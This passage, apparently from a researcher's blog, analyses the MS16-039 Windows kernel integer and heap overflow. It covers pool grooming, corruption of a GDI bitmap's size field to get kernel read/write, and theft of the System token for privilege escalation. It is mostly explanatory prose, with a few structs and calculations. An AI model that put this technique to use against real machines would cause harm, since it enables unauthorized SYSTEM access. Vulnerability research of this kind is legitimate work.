The second argument is a POINT struct array and the third one is the array size.

It’s easy to think that, if we create 0x55555556 structs and then, we pass this structures as parameter we will trigger the vulnerability but WE WON’T, let’s see why.

If we analyze the «PolylineTo» internal code, we can see a call to «NtGdiPolyPolyDraw».

PolylineTo

«NtGdiPolyPolyDraw» is located in «win32kbase.sys», part of the Windows kernel.

If we see this function, there is a check in the POINT struct number passed as argument:

NtGdiPolyPolyDraw

The maximum POINTs number that we can pass as parameter is 0x4E2000.

It’s clear that there is not a direct way to reach the wanted number to trigger this vulnerability, so what is the trick ?

Well, after some tests, the answer was pretty simple: «call many times to PolylineTo until reach the wanted number of POINT structs».

And the result was this:

ms16_039-bad-pool

The trick is to understand that the «PathToRegion» function processes the sum of all POINT structs assigned to the HDC passed as argument.

PALLOCMEM2 function — «Bonus Track»

Triggering this vulnerability is relatively easy in 64 bit targets like Windows 8, 8.1 y 10.
Now, in «Windows 7» 64 bits, the vulnerability is very difficult to exploit.

Let’s see the vulnerable basic block and the memory allocator function:

ms16-039-w7-io1

The destination of the multiplication by 3 is a 64 bit register (rdx), not a 32 bit register like Windows versions mentioned before.

The only feasible way to produce an integer overflow is with the previous instruction:

ms16-039-w7-io2

In this case, the number of POINTs to be assigned to the HDC should be greater than or equal to 4GB.
Unfortunately, during my tests it was easier to get a kernel memory exhaustion than allocate this number of structures.

Now, why Windows 7 is different to the latest Windows versions ?

Well, if we look the previous picture, we can see that there is a call to «__imp_ExAllocatePoolWithTag», instead of «PALLOCMEM2».

What is the difference ?

The «PALLOCMEM2» function receives a 32 bit argument size, but the  «__imp_ExAllocatePoolWithTag» function receives a 64 bit argument size.
The argument type defines how the result of the multiplication will be passed to the function allocator, in this case, the result is casted to «unsigned int».

We could guess that functions that used to call «__imp_ExAllocatePoolWithTag» in Windows 7 and now they call «PALLOCMEM2» have been exposed to integer overflows much easier to exploit.

Analyzing the heap overflow

Once we trigger the integer overflow, we have to understand what the consequences are.

As a result, we obtain a heap overflow produced by the copy of POINT structs, via the «bConstructGET» function (child of the vulnerable function), where every single struct is copied by «AddEdgeToGet».

heap_overlfow_callgraph

This heap overflow is produced when POINT structs are converted and copied to the small allocated memory.

It’s intuitive to think that, if 0x55555556 POINT structs were allocated, the same number will be copied.
If this were true, we would have a huge «memcpy» that it would destroy a big part of the Windows kernel heap, which quickly would give us a BSoD.

What makes it a nice bug is that the «memcpy» can be controlled exactly with the number of POINTs that we want, regardless of the total number passed to the the vulnerable function.

The trick here is that only POINT structs are copied when coordinates ARE NOT REPEATED.
E.g: if «POINT.A is X=30/Y=40» and «POINT.B is X=30/Y=40», only one will be copied.

Thus, it’s possible to control exactly how many structures will be used by the heap overflow.

Some exploitation considerations

One of the most important things to know before to start to write the exploit is that, the vulnerable function allocates memory and produces the heap overflow, but when this function finishes, it frees the allocated memory, since this is used only temporarily.

ms16_039-alloc-free

It means that, when the memory is freed, the Windows kernel will check the current heap chunk header and the next one.
If the next one is corrupted, we will get a BSoD.

Unfortunately, only some values to be overwritten are totally controlled by us, so, we are not able to overwrite the next chunk header with its original content.

On the other hand, we could think the alloc/free operation like «atomic», because we don’t have control execution until the «PathToRegion» function returns.

So, How is it possible to successfully exploit this vulnerability ?

Four years ago I explained something similar in the»The Big Trick Behind Exploit MS12-034» blogpost.

Without a deep reading of the blogpost previously mentioned, the only thing to know is that if the allocated memory chunk is at the end of the 4KB memory page, THERE WON’T BE A NEXT CHUNK HEADER.

So, if the vulnerable function is able to allocate at the end of the memory page, the heap overflow will be done in the next page.
It means that the DATA contained by the second memory page will be corrupted but, we will avoid a BSoD when the allocated memory is freed.

Finding the best memory allocator

Considering the previous one, now it’s necessary to create a very precise heap spray to be able to allocate memory at the end of the memory page.

ms16-039-chunk

When heap spray requires several interactions, meaning that memory chunks are allocated and freed many times, the name used for this technique is «Heap Feng Shui», making reference to the ancient Chinese technique (https://en.wikipedia.org/wiki/Feng_shui).

The POOL TYPE used by the vulnerable function is 0x21, which according to Microsoft means «NonPagedPoolSession» + «NonPagedPoolExecute».

Knowing this, it’s necessary to find some function that allow us to allocate memory in this pool type with the best possible accuracy.

The best function that I have found to heap spray the pool type 0x21 is via the «ZwUserConvertMemHandle» undocumented function, located in «gdi32.dll» and «user32.dll».

ZwUserConvertMemHandle

When this function is called from user space, the «NtUserConvertMemHandle» function is invoked in kernel space, and this one calls «ConvertMemHandle», both located in «win32kfull.sys».

If we look at the «ConvertMemHandle» code, we can see the perfect allocator:

ConvertMemHandle

Basically, this function receives 2 parameters, BUFFER and SIZE and returns a HANDLE.

If we only see the yellow basic blocks, we can see that the «HMAllocObject» function allocates memory through «HMAllocObject».
This function allocates SIZE + 0x14 bytes.
After that, our DATA is copied by «memcpy» to this new memory chunk and it will stay there until it’s freed.

To free the memory chunk created by «NtUserConvertMemHandle», we have to call two functions consecutively: «SetClipboardData» and «EmptyClipboard«.

Summing up, we have a function that allows us to allocate and free memory in the same place where the heap overflow will be done.

Choosing GDI objects to be overwritten

Now, we know how to make a good Heap Feng Shui, we need to find something interesting to be corrupted by the heap overflow.

Considering Diego Juarez’s blogpost «Abusing GDI for ring0 exploit primitives» and exchanging some ideas with him, we remembered that GDI objects are allocated in the pool type 0x21, which is exactly what I needed to exploit this vulnerability.

In that blogpost he described how GDI objects are composed:

typedef struct
 {
   BASEOBJECT64 BaseObject;
   SURFOBJ64 SurfObj;
   [...]
 } SURFACE64;

As explained in the blogpost mentioned above, if the «SURFOBJ64.pvScan0» field is overwritten, we could read or write memory where we want by calling «GetBitmapBits/SetBitmapBits».

In my case, the problem is that I don’t control all values to be overwritten by the heap overflow, so, I can’t overwrite this property with an USEFUL ADDRESS.

A variant of abusing GDI object

Taking into account the previous information, I decided to find another GDI object property to be overwritten by the heap overflow.

After some tests, I found a very interesting thing, the «SURFOBJ64.sizlBitmap» field.
This field is a SIZE struct that defines width and height of the GDI object.

This picture shows the content of the GDI object, before and after the heap overflow:
ms16_039-heap-overflow

The final result is that the «cx» property of the «SURFOBJ64.sizlBitmap» SIZE struct is set with the 0xFFFFFFFF value.
It means that now the GDI object is width=0xFFFFFFFF and height=0x01.

So, we are able to read/write contiguous memory far beyond the original limits set for «SURFOBJ64.pvScan0»!

Another interesting thing to know is that, when GDI objects are smaller than 4KB, the DATA pointed by «SURFOBJ64.pvScan0» is contiguous to the object properties.

With all these things, it was time to write an exploit …

Exploitation — Step 1

In the exploit I wrote, I used 0x55555557 POINT structs, which is one more point than what I gave as an example.

So, the new calculation is:

0x55555557 x 3 = 0x1'0000'0005

As the result is a 32 bit number, we get 0x5, an then this number is multiplied by 16

0x5 << 4 = 0x50

It means that «PALLOCMEM2» function will allocate 0x50 bytes when the vulnerable function calls it.

The reason why I decided to increase the size by 0x30 bytes is because very small chunk allocations are not always predictable.

Adding the chunk header size (0x10 bytes), the heap spray to do should be like this:ms16_039-heap-spray-candidate

Looking at the previous picture, only one FREE chunk will be used by the vulnerable function.
When this happens, there will be a GDI object next to this one.

For alignment problems between the used small chunk and the «SURFOBJ64.sizlBitmap.cx» property, it was necessary to use an extra PADDING chunk.
It means that three different memory chunks were used to make this heap feng shui.

Hitting a breakpoint after the memory allocation, we can see how the heap spray worked and what position, inside the 4KB memory page, was used by the vulnerable function.

ms16-039-heap-spray

Making some calculations, we can see that if we add «0x60 + 0xbf0» bytes to the allocated chunk, we get the first GDI object (Gh15) next to it.

Exploitation — Step 1.5

Once a GDI object has been overwritten by the heap overflow, it’s necessary to know which one it is.

As the heap spray uses a big number of GDI objects, 4096 in my case, the next step is to go through the GDI object array and detect which has been modified by calling «GetBitmapBits».
When this function is able to read beyond the original object limits, it means that the overwritten GDI object has been found.

Looking at the function prototype:

HBITMAP CreateBitmap(
 _In_ int nWidth,
 _In_ int nHeight,
 _In_ UINT cPlanes,
 _In_ UINT cBitsPerPel,
 _In_ const VOID *lpvBits
 );

As an example, we could create a GDI object like this:

CreateBitmap (100, 100, 1, 32, lpvBits);

Once the object has been created, if we call «GetBitmapBits» with a size bigger than 100 x 100 x 4 bytes (32 bits) it will fail, except if this object has been overwritten afterwards.

So, the way to detect which GDI object has been modified is to check when its behavior is different than expected.

Exploitation — Step 2

Now we can read/write beyond the GDI object limits, we could use this new skill to overwrite a second GDI object, and thus, to get an arbitrary write.

Looking at our heap spray, we can see that there is a second GDI object located 0x1000 bytes after from the first one.

ms16-039-gdi-secuence

So, if from the first GDI object, we are able to write the contiguous memory that we want, it means that we can modify the «SURFOBJ64.pvScan0» property of the second one.

Then, if we use the second GDI object by calling «GetBitmapBits/SetBitmapBits», we are able to read/write where we want to because we control exactly which address will be used.

Thus, if we repeat the above steps, we are able to read/write ‘n’ times any kernel memory address from USER SPACE, and at the same time, we will avoid running ring-0 shellcode in kernel space.

It’s important to say that before overwriting the «SURFOBJ64.pvScan0» property of the second GDI object, we have to read all DATA between both GDI objects, and then overwrite the same data up to the property we want to modify.

On the other hand, it’s pretty simple to detect which is the second GDI object, because when we read DATA between both objects, we are getting a lot of information, including its HANDLE.

Summing up, we use the heap overflow to overwrite a GDI object, and from this object to overwrite a second GDI object next to it.

Exploitation — Final Stage

Once we get a kernel read/write primitive, we could say that the last step is pretty simple.

The idea is to steal the «System» process token and set it to our process (exploit.exe).

As this attack is done from «Low Integrity Level», we have to know that it’s not possible to get TOKEN addresses by calling «NtQuerySystemInformation» («SystemInformationClass = SystemModuleInformation»), so, we have to take the long way.

The EPROCESS list is a linked list, where every element is a EPROCESS struct that contains information about a unique running process, including its TOKEN.

This list is pointed by the «PsInitialSystemProcess» symbol, located in «ntoskrnl.exe».
So, if we get the Windows kernel base, we could get the «PsInitialSystemProcess» kernel address, and then to do the famous TOKEN KIDNAPPING.

The best way I know of leaking a Windows kernel address is by using the «sidt» user-mode instruction.
This instruction returns the size and address of the operating system interrupt list located in kernel space.

Every single entry contains a pointer to its interrupt handler located in «ntoskrnl.exe».
So, if we use the primitive we got previously, we are able to read these entries and get one «ntoskrnl.exe» interrupt handler address.

The next step is to read backwards several «ntoskrnl.exe» memory addresses until you find the well known «MZ», which means it’s the base address of «ntoskrnl.exe».

Once we get the Windows kernel base, we only need to know what the «PsInitialSystemProcess» kernel address is.
Fortunately, from USER SPACE it’s possible to use the «LoadLibrary» function to load «ntoskrnl.exe» and then to use «GetProcAddress» to get the «PsInitialSystemProcess» relative offset.

As a result of what I explained before, I obtained this:

ms16-039-exploitation

Final notes

It’s important to say that it wasn’t necessary to use the GDI objects memory leak explained by the «Abusing GDI for ring0 exploit primitives» blogpost.

However, it’s interesting to see how «Windows 10» 64 bits can be exploited from «Low Integrity Level» through kernel vulnerabilities, despite all kernel exploit mitigations implemented until now.